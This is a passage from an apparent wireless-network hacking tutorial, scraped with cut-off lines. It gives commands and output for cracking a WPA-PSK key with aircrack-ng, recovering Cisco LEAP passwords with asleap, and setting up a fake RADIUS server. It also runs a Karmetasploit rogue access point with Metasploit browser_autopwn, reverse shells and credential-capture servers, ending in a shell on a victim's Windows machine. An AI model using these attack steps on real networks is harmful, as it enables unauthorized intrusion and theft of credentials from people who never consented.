[zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack. #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap The successful result is following. -------------------------------------------------------------------------------- Opening test-02.cap Read 252 packets. # BSSID ESSID Encryption 1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) Choosing first network as target. Opening workshop-02.cap Reading packets, please wait... Aircrack-ng 1.0 rc1 r1085 [00:00:00] 0 keys tested (0.00 k/s) KEY FOUND! [ TheFuckinWPAKey ] Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D -------------------------------------------------------------------------------- From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey". ############################################################# [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP) ############################################################# Most companies turned to use public key encryption with wireless network and they think that it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate. This attacking method takes an advantage of client incaution. Many clients accept certification without considering whether it is genuine certificate or not. This make attacker impersonate himself to be radius server and loggin credential information from victims. We can use freeradius as fake radius server combining with wpe patch to enable loggin credential information on freeradius server 8 of 12 12/24/10 5:48 PM
  • 9. Vulnerability analysis, Security Papers, Exploit Tutorials additional information: ################################ [0x09] - Exploiting CISCO LEAP ################################ Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate se by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extens types specified by 802.1X. LEAP is easy to implement and contains compelling features such as: - Mutual Authentication - User-Based Authentication - Dynamic WEP Keys We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also V asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords - Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture - Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED Download Here: First step, Use asleap to produce the necessary database (.dat) and index files (.idx) #./genkeys -r dict -f dict.dat -n dict.idx dict = Our wordlist/dictionary file, with one word per line dict.dat = Our new output pass+hash file (generated as a result of running this command) dict.idx = Our new output index filename (generated as a result of running this command) #./genkeys -r dictionary -f dict.dat -n dict.idx ----------------------------------------------------------------------- genkeys 1.4 - generates lookup file for asleap. <> Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second Starting sort (be patient) ...Done. Completed sort in 0 compares. Creating index file (almost finished) ...Done. ----------------------------------------------------------------------- The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file #./asleap -r data/leap.dump -f dict.dat -n dict.idx leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c dict.dat = Our output pass+hash file (generated with genkeys, see above) dict.idx = Our new output index filename (generated with genkeys, see above) #./asleap -r data/leap.dump -f dict.dat -n dict.idx ----------------------------------------------------------------------- asleap 1.4 - actively recover LEAP/PPTP passwords. <> Using the passive attack method. Captured LEAP exchange information: username: qa_leap challenge: 0786aea0215bc30a response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 hash bytes: 4a39 NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 password: qaleap Closing pcap ... ----------------------------------------------------------------------- Notice: The successful rate is up to dictionary size Now ASLEAP 2.2, which includes the “-C†and “-R†options to specify the hex-delimited bytes for the challenge an ########################################## [0x10] - Mass Exploit with Karmetasploit ########################################## HD Moore released some documentation ( to get karmetasploit working with the Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, cre of the client and still also exploit the browser vulnerabilities on client machine. This Method was test in Backtrack3 (Final) 1. Update Aircrack-NG $ svn co aircrack-ng $ make # make install 9 of 12 12/24/10 5:48 PM
  • 10. Vulnerability analysis, Security Papers, Exploit Tutorials 2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet) bt# aireplay-ng -9 wlan0 15:10:21 Trying broadcast probe requests... 15:10:21 Injection is working! 15:10:25 Found 5 APs 15:10:25 Trying directed probe requests... 15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC' 15:10:35 0/30: 0% 15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP' 15:10:42 0/30: 0% 15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM' 15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27 15:10:48 5/30: 60% 15:10:48 Injection is working! 15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi' 15:56:53 0/30: 0% Now It's work for Injection !! 3. Update Metasploit $ svn co msf3 4. Download Bash script from The script will do the following: - Change the MAC address of the interface - Set the Interface in Monitor Mode - Start the Karma AP with Airbase-ng - Change the MTU Size for the interface - Set the IP - Start the DHCPD server - Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries - Start Metasploit. 6. After that we run our like this: #./ -i wlan0 -m km -s linksys Changing MAC Address Current MAC: 00:0f:c1:08:12:91 (Wave Corporation) Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.) starting fake ap This will take 15 seconds .............. DHCPD started successfully Starting Packet capture to /root/kms.cap Starting Metasploit _ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / _|/ _|/ / _| | | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/ /| | =[ msf v3.2-release + -- --=[ 304 exploits - 124 payloads + -- --=[ 18 encoders - 6 nops =[ 79 aux resource> load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3 resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST AUTOPWN_HOST => resource> setg AUTOPWN_PORT 55550 AUTOPWN_PORT => 55550 resource> setg AUTOPWN_URI /ads AUTOPWN_URI => /ads resource> set LHOST LHOST => resource> set LPORT 45000 LPORT => 45000 resource> set SRVPORT 55550 SRVPORT => 55550 resource> set URIPATH /ads URIPATH => /ads resource> run 10 of 12 12/24/10 5:48 PM
  • 11. Vulnerability analysis, Security Papers, Exploit Tutorials [*] Starting exploit modules on host [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Using URL: [*] Local IP: [*] Server started. [*] Started reverse handler [*] Server started. [*] Using URL: [*] Local IP: [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 110 SRVPORT => 110 resource> set SSL false SSL => false resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 995 SRVPORT => 995 resource> set SSL true SSL => true resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/ftp resource> run [*] Server started. ... ... [*] Sending Firefox location.QueryInterface() Code Execution to [*] Command shell session 2 opened ( -> msf auxiliary(http) > sessions -i 2 [*] Starting interaction with 2... Microsoft Windows XP [Vesion 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. D:Mozilla Firefox> cd .. D:net user User accounts for CWH ------------------------------------------------------------------------------- __vmware_user__ Administrator ASPNET Guest HelpAssistant IUSR_CWH IWAM_CWH CWH SUPPORT_388945a0 The command completed successfully. Enjoy for Pwnage !!. Oops, For pentest :p 11 of 12 12/24/10 5:48 PM
  • 12. Vulnerability analysis, Security Papers, Exploit Tutorials ##################### [0x11] - References ##################### [1] PaulDotCom Forum [2] [3] [4] [5] [6] #################### [0x12] - Greetz To #################### Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke,, ---------------------------------------------------- This paper is written for Educational purpose only. The authors are not responsible for any damage originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, you must request for consent from system owner before ---------------------------------------------------- # [2009-02-24] © Offensive Security 2010 12 of 12 12/24/10 5:48 PM